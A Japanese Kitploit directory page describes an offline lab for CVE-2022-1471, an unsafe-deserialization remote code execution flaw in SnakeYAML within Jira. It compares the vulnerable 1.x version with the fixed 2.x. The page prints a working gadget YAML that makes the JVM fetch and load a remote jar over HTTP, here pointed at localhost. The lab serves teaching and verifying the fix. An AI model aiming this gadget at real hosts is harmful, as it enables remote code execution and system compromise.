Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cve-2022-1471-jira-lab — オフラインCVE-2022-1471ラボ: SnakeYAMLの安全でないデシリアライゼーションによるRCE; 無害なローカルペイロードを使用して、脆弱な1.x版と修正済み2.x版を比較します。 | Kitploit
ツール/GitHubGitHub/aykhan019/cve-2022-1471-jira-lab
脆弱性分析エクスプロイト学習と教育ラボと実践
GitHubaykhan019/cve-2022-1471-jira-lab

cve-2022-1471-jira-lab

オフラインCVE-2022-1471ラボ: SnakeYAMLの安全でないデシリアライゼーションによるRCE; 無害なローカルペイロードを使用して、脆弱な1.x版と修正済み2.x版を比較します。

リポジトリを見る
5日前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-1471 — SnakeYAML RCE ラボ (Jira / Automation for Jira コンテキスト)

CVE-2022-1471 の背後にある仕組みを実証する、オフラインで自己完結型のラボです (SnakeYAML の安全でないデシリアライゼーション → RCE、CVSS 9.8)。これは、Jira / Jira Service Management の検出結果で 9.4.9 を実行しているホストに対して使用されたものです (影響範囲 9.4.0–9.4.12、9.4.14 で修正済み — Atlassian の JSDSERVER-14906 を参照)。

このラボは、正確に次の 2 つのことを実証します。

  1. SnakeYAML 1.31 (Jira 9.4.9 にバンドルされる Automation for Jira アプリに 同梱されている 1.x 系) は、YAML の解析中に標準的なガジェットを実行します — コード が実行され、マーカーファイルが書き込まれます。
  2. SnakeYAML 2.2 (9.4.14+ の修正で同梱される系) は、同じペイロードを 拒否します (ConstructorException) — 何も実行されません。

このラボは、稼働中のホストを一切悪用しません。すべては 127.0.0.1 上で実行されます。 ペイロード (src/Exploit.java) は無害です — その静的初期化子はテキストファイルを 1 つ書き込むだけで、 それ以外のことは何もしません。

実行方法

root@kitploit:~
./run.sh
cat PWNED-proof.txt   # on-disk proof of execution (regenerated each run)

JDK 17+ が PATH 上にある必要があります (javac、java、jar)。tools/ 配下に バンドルされた JDK が存在する場合は、そちらが代わりに使用されます。ネットワークトラフィックは、 127.0.0.1:8077 上のローカル HTTP サーバーのみで、終了時に停止されます。

仕組み

src/VulnDemo.java は、素の new Yaml().load(yaml) です — これは、脆弱性のある Automation for Jira のバージョンがインポートされたルール YAML に対して行うのと同じ、安全でない呼び出しです。 攻撃者側の YAML は、標準的なガジェットです:

root@kitploit:~
!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://127.0.0.1:8077/payload.jar"]
  ]]
]

SnakeYAML 1.x は、許可リストなしで任意のクラスをインスタンス化します → JVM が「攻撃者」 サーバーからクラスを取得してロードします → その静的初期化子が実行されます。SnakeYAML 2.x は、 デフォルトで SafeConstructor になり、 グローバルタグを拒否します。

sample-output-PWNED-proof.txt は、実行時のマーカーファイルの内容を示しています。 screenshots/ は、両方の実行 (脆弱な場合と修正済みの場合) を示しています。

対象範囲 / 免責事項

許可されたセキュリティ研究です。ライブラリの仕組みと修正の境界の実証のみを 目的としており、本番システムに対するエクスプロイトではありません。Jira ベクトルを 悪用するには、さらに認証済み (Jira 管理者) によるオートメーションルールの インポートが必要です。

参照

  • NVD — CVE-2022-1471
  • Atlassian FAQ for CVE-2022-1471
  • Atlassian JSDSERVER-14906
  • SnakeYAML issue #561
ツールをダウンロード